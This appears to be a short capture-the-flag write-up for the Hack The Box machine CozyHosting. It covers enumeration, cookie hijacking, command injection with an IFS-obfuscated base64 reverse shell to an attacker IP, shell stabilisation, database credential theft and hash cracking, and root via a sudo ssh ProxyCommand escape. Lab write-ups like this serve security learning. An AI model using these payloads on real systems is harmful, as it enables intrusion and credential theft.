# CozyHosting ## 1.nmap scan  sudo vim /etc/hosts 10.10.11.230 cozyhosting.htb  ## 2.目錄枚舉(dirb dirsearch...) sudo apt-get install dirsearch  http://cozyhosting.htb/actuator/sessions  ## 3.Burp 攔截Login sessions  修改cookie後成功登入並發現有ssh登入驗證  攔截發現error=/bin/bash: -c  ## 4.Reverse shell [kali] nc -nvlp 9001 ``` echo "bash -i >& /dev/tcp/10.10.14.47/9001 0>&1" | base64 -w 0 ```  ``` ;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Ny85MDAxIDA+JjEK"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash; ``` url encode key characters  成功反連  穩定shell ``` python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ctrl + z stty raw -echo; fg ``` ls  發現jar檔案 sudo wget http://10.10.11.230:4444/cloudhosting-0.0.1.jar jd-gui [filename]  ## 5.密碼破解 ``` psql -h 127.0.0.1 -U postgres ``` password:Vg&nvzAQ7XxR  ``` \c cozyhosting select * from users ``` admin $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm (q離開)  john cozy.txt --wordlist=/usr/share/wordlists/rockyou.txt (gzip -d rockyou.txt.gz) manchesterunited  cat /etc/passwd 發現josh用戶名  ## 6.提權 ssh josh@10.10.11.230 ls cat user.txt (flag1) ``` sudo -l sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x ``` (GTFOBINS) https: //gtfobins.github.io/gtfobins/ssh/#sudo  cat root.txt(flag2)